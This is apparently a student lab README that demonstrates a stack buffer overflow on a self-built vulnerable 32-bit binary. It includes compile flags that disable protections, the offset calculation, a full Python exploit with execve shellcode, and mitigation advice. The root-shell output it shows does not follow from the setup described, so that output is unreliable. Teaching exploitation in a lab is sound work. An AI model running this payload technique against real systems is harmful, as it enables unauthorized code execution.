binary-exploitation-buffer-overflow

Name: binary-exploitation-buffer-overflow
Rating: 5 (95 reviews)
2026-04-25 | CVSS 6.0
## https://sploitus.com/exploit?id=C809D7AF-B96A-5BF2-8B09-3F6EEEDF554A
# Stack Buffer Overflow Exploit Demo

![Python](https://img.shields.io/badge/Python-3.x-blue.svg)
![GDB](https://img.shields.io/badge/GDB-17.1-red.svg)
![GCC](https://img.shields.io/badge/GCC-32bit-orange.svg)
![License](https://img.shields.io/badge/License-MIT-green.svg)

---

## 📋 Overview

This project demonstrates a complete stack-based buffer overflow exploitation on a vulnerable 32-bit binary. By providing an oversized input, it overwrites the saved return address (EIP) on the stack, redirects program execution to injected shellcode, and spawns a system shell.

---

## 🎯 Key Findings

| Metric | Value |
|--------|-------|
| Vulnerability Type | Stack-Based Buffer Overflow |
| Offset to EIP | 812 bytes |
| Return Address | 0xffffc7b8 |
| NOP Sled Size | 400 bytes |
| Shellcode Size | 23 bytes |
| Total Payload | 1239 bytes |
| Exploit Success | Yes |

---

## 🏗️ Project Structure

- **Stack-Buffer-Overflow-Exploit-Demo/**
  - `assignment.c` - Vulnerable C program
  - `exploit.py` - Python exploit script
  - `report.pdf` - Detailed exploitation report
  - `README.md` - Project documentation

---

## 🔧 Environment Setup

### System Requirements

| Component | Specification |
|-----------|---------------|
| Operating System | Kali Linux |
| Architecture | 32-bit (x86) |
| Compiler | GCC |
| Debugger | GDB 17.1 |

### Compilation

Compile the vulnerable binary with disabled protections:

```bash
gcc -m32 -g -fno-stack-protector -z execstack -no-pie assignment.c -o assignment
```
### Compiler Flags Explained

| Flag | Purpose |
|------|---------|
| `-m32` | Compile for 32-bit architecture |
| `-fno-stack-protector` | Disable stack canaries |
| `-z execstack` | Enable executable stack |
| `-no-pie` | Disable ASLR for binary |
| `-g` | Include debug symbols |

### Disable ASLR

```bash
sudo sysctl -w kernel.randomize_va_space=0
```
### Verify ASLR is disabled:
```
cat /proc/sys/kernel/randomize_va_space
# Output: 0
```
## 🔍 Source Code Analysis

### Vulnerable Code

```c
void saveMessage(char *input) {
    char message[800];
    strcpy(message, input);  // Vulnerability: No bounds checking
}
```
---

### Vulnerability Summary

- No bounds checking in `strcpy()`
- Fixed buffer size (800 bytes)
- Stack is executable
- No stack canaries

---

## 💥 Vulnerability Discovery (Fuzzing)

| Input Size | Result |
|------------|--------|
| 100 bytes | OK |
| 500 bytes | OK |
| 900 bytes | CRASH |

---

## 📐 Offset Calculation

Using Metasploit pattern to find exact offset to EIP:

```bash
msf-pattern_offset -l 2000 -q 0x31624230
```
Result: Offset = 812 bytes

---
## 🚀 Exploit Development

### Payload Structure

| Part | Size |
|------|------|
| Padding | 812 bytes |
| Return Address | 4 bytes |
| NOP Sled | 400 bytes |
| Shellcode | 23 bytes |

### Exploit Script (exploit.py)

```python
#!/usr/bin/env python3
import struct

# Shellcode for spawning a shell (23 bytes)
shellcode = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
    b"\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    b"\x53\x89\xe1\xb0\x0b\xcd\x80"
)

# NOP sled
nop_sled = b"\x90" * 400

# Return address (adjust to your environment)
ret_addr = struct.pack("<I", 0xffffc7b8)

# Padding to reach EIP (812 bytes)
padding = b"A" * 812

# Build payload
payload = padding + ret_addr + nop_sled + shellcode

# Write payload to file
with open("payload.bin", "wb") as f:
    f.write(payload)

print(payload)
```
## 💻 Proof of Concept

### Execute Exploit

```bash
./assignment "$(python3 exploit.py)"
```
---
### Expected Output
```text
Message stored successfully.
$ whoami
root
$ id
uid=0(root) gid=0(root)
$ pwd
/home/user
```
Shell access confirmed.

---
## 📋 Exploitation Steps Summary

1. **Fuzzing** - Identified crash at 900 bytes
2. **Offset Calculation** - Found exact EIP offset (812 bytes)
3. **Return Address** - Located address pointing to NOP sled
4. **Payload Construction** - Built exploit with padding + return address + NOP sled + shellcode
5. **Shell Access** - Successfully spawned system shell

---

## 🛡️ Mitigation Recommendations

| Mitigation | Description |
|------------|-------------|
| Use `strncpy()` instead of `strcpy()` | Limit copied bytes to buffer size |
| Enable stack canaries | Compile with `-fstack-protector` |
| Disable executable stack | Compile without `-z execstack` |
| Enable ASLR | Re-enable address randomization |
| Use non-executable memory | Apply NX bit protection |

---

## 📚 Technologies Used

| Technology | Purpose |
|------------|---------|
| Python 3 | Exploit scripting |
| GDB 17.1 | Debugging and analysis |
| GCC | Compilation of vulnerable binary |
| Metasploit | Pattern generation and offset calculation |
| Kali Linux | Exploitation environment |

---

## 👤 Author

| Name | ID |
|------|-----|
| Mayssoune Hussein Elmasry | 2205251 |

---

## 📄 License

This project is licensed for educational purposes only.

---

## ⚠️ Disclaimer

This project is for **educational purposes only**. Buffer overflow exploitation should only be performed on authorized systems and vulnerable binaries in controlled lab environments. Do not use these techniques on production systems without permission.

---

⭐ If you find this project useful, please consider giving it a star on GitHub!